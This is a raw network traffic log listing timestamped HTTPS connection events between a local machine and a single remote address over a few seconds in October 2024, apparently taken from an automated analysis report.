                                                Oct 30, 2024 00:22:59.708493948 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.708528042 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.721147060 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.721544027 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.721606970 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.722105026 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.722125053 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.727735043 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.727994919 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.728039026 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.728445053 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.728456020 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.801664114 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.801794052 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.801868916 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.802107096 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.802125931 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.802139044 CET58126443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.802145958 CET4435812613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.804547071 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.804634094 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.804702997 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.804810047 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.804831028 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.804847002 CET58125443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.804855108 CET4435812513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.806013107 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.806052923 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.806123018 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.806329966 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.806349039 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.807358980 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.807414055 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.807492971 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.807642937 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.807658911 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.863250017 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.863559961 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.863616943 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.863660097 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.863677025 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.863692045 CET58127443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.863698006 CET4435812713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.866569042 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.866596937 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.866666079 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.866808891 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.866827011 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.930474043 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.930545092 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.930795908 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.931490898 CET58128443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.931508064 CET4435812813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.938842058 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.938882113 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:59.939028978 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.939506054 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:59.939522028 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.430368900 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.431577921 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.431611061 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.432487965 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.432495117 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.555092096 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.556232929 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.556253910 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.557674885 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.557682991 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.558455944 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.559381962 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.559412956 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.560726881 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.560734987 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.563431978 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.563487053 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.563580036 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.564027071 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.564048052 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.564083099 CET58129443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.564090967 CET4435812913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.571069956 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.571122885 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.571264982 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.571768999 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.571784019 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.622677088 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.623507977 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.623537064 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.624878883 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.624885082 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.689326048 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.689979076 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.690077066 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.690160036 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.690160990 CET58130443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.690203905 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.690231085 CET4435813013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.693746090 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.693785906 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.693861961 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.694016933 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.694031000 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.694259882 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.694426060 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.694502115 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.694586039 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.694586039 CET58131443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.694629908 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.694655895 CET4435813113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.697206974 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.697287083 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.697364092 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.697485924 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.697519064 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.708359003 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.708746910 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.708762884 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.709331036 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.709336042 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.754829884 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.755148888 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.755526066 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.755526066 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.755526066 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.758944035 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.758975029 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.759047031 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.759171963 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.759185076 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.843348980 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.843427896 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.843485117 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.843722105 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.843743086 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.843766928 CET58133443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.843774080 CET4435813313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.846955061 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.847060919 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:00.847282887 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.847454071 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:00.847491026 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.070971966 CET58132443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.071007967 CET4435813213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.333489895 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.334580898 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.334616899 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.335156918 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.335164070 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.423886061 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.425160885 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.425187111 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.426429033 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.426434994 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.437031031 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.437947989 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.438010931 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.439342976 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.439361095 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.468789101 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.468853951 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.469013929 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.469111919 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.469132900 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.469146013 CET58134443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.469152927 CET4435813413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.472125053 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.472167969 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.472266912 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.472558022 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.472575903 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.499999046 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.500695944 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.500709057 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.502015114 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.502019882 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.555124044 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.555183887 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.555331945 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.555946112 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.555958986 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.555988073 CET58135443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.555993080 CET4435813513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.562666893 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.562716961 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.562809944 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.562971115 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.562987089 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.568525076 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.568619013 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.568681955 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.568886995 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.568932056 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.568959951 CET58136443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.568977118 CET4435813613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.574268103 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.574294090 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.574418068 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.574668884 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.574960947 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.574978113 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.575489998 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.575516939 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.576792955 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.576807976 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.630013943 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.630064011 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.630115032 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.630125046 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.630203009 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.630338907 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.630338907 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.630338907 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.636095047 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.636130095 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.636257887 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.636567116 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.636584044 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.705559969 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.705606937 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.705660105 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.705776930 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.705818892 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.705846071 CET58138443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.705861092 CET4435813813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.709431887 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.709450006 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.709549904 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.709678888 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.709692001 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:01.930408001 CET58137443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:01.930427074 CET4435813713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.305974007 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.306607962 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.306628942 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.307307959 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.307321072 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.311343908 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.311621904 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.311638117 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.312078953 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.312084913 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.411876917 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.412386894 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.412398100 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.412837029 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.412842989 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.415987015 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.416264057 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.416276932 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.416723013 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.416728020 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.435585022 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.435604095 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.435655117 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.435664892 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.435834885 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.436001062 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.436012983 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.436028004 CET58140443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.436033964 CET4435814013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.439340115 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.439364910 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.439450026 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.439604998 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.439620972 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.441798925 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.441828012 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.441889048 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.441895008 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.441932917 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.442101002 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.442114115 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.442130089 CET58141443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.442136049 CET4435814113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.443916082 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.444197893 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.444206953 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.444551945 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.444586992 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.444591999 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.444598913 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.444667101 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.444788933 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.444804907 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547331095 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547535896 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547595978 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.547660112 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.547673941 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547686100 CET58139443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.547691107 CET4435813913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547823906 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547873974 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.547918081 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.547930956 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.548046112 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.548054934 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.548074961 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.548083067 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.548094034 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.548094988 CET58142443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.548109055 CET4435814213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.550530910 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.550543070 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.550614119 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.550748110 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.550757885 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.550761938 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.550781012 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.550838947 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.550915003 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.550925970 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.577199936 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.577353954 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.577415943 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.577511072 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.577518940 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.577533007 CET58143443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.577538967 CET4435814313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.579668999 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.579698086 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:02.579760075 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.579869032 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:02.579885006 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.177792072 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.179018974 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.179060936 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.180423975 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.180443048 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.201275110 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.202183008 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.202239037 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.203538895 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.203558922 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.286282063 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.287672997 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.287698984 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.288892031 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.288902998 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.290318012 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.291187048 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.291213036 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.292368889 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.292382956 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.313895941 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.313957930 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.314050913 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.314476013 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.314508915 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.314547062 CET58144443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.314560890 CET4435814413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.321082115 CET58149443192.168.2.413.107.246.60
